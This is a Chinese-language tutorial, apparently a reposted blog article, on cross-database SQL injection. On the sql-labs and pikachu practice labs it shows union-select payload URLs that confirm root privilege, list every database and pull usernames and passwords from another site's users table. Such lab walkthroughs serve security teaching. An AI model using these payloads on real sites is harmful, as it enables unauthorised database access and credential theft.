SQL注入—跨库注入
1.SQL注入—跨库注入
1.1.前言
该部分补充之前发布的SQL注入基础原理与案例中未提到的跨库注入。后续也会在之前发布过的文章中再逐渐补充未提到内容。
SQL注入基础原理与案例:参考文章
1.2.跨库注入介绍
跨库注入首先需要明确注入点的权限,若不是root权限或者管理员权限,那么无法执行跨库注入,只有高权限才能执行跨库注入。
简单来说,跨库注入就是在同一个数据库管理系统中,在某一个点存在SQL注入,而通过这点查询到,该权限为Root权限,那么就可以使用这种方式去操作同数据库下的其它网站数据库,这样就实现的跨库注入。
2.跨库注入
2.1.跨库注入准备
这里我们采用联合注入方式进行演示,其它的注入方式都是一样的操作,前提是需要拥有管理员权限。
同时采用sql-labs靶场来演示,sql-labs靶场安装可以参考以下链接。
sql-labs靶场安装:靶场安装
2.2.跨库注入流程
这里前期寻找注入点什么时候都不说了,直接判断并进行测试。
2.2.1.判断是否为管理员权限
可以看到这里是为root权限,而且当前网站的数据库是security,那么我们该如何进行跨库注入,不过这里我们已经获取到的是管理员权限,那么我们就已经完成了前置条件了。
命令:http://192.168.10.150/sql-labs/Less-2/?id=-1 union select 1,user(),database()--+
2.2.2.获取数据库下所有库
这里我们就使用information_schema.schemata获取所有的数据库名,由于在Mysql>5.0版本的时候都会将所有库、所有表、所有列都会放在一张统一的表中,具体的原因还需要去了解数据库,这里我也过多的解释,我们看如何使用即可。
命令:http://192.168.10.150/sql-labs/Less-2/?id=-1 union select 1,group_concat(schema_name),3 from information_schema.schemata--+
2.2.3.获取pikachu下的表
这里我们可以看到,获取到了pikachu数据库,那么我们就读取pikachu数据库下的表。
需要注意并不是读sql-labs的数据库哦,sql-labs数据库名叫security,而pikachu数据库是pikachu靶场的数据库哦,来实现跨库注入。
命令:http://192.168.10.150/sql-labs/Less-2/?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='pikachu'--+
2.2.4.获取pikachu表中列
这里我们获取pikachu中的users表走的列。
命令:http://192.168.10.150/sql-labs/Less-2/?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' and table_schema='pikachu'--+
2.2.5.获取pikachu列中数据
这里需要注意,先写数据库名,如何在写数据库表名,例如:数据库名.数据库表名。
命令:http://192.168.10.150/sql-labs/Less-2/?id=-1 union select 1,username,password from pikachu.users--+
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
文章由极客之音整理,本文链接:https://www.bmabk.com/index.php/post/133395.html
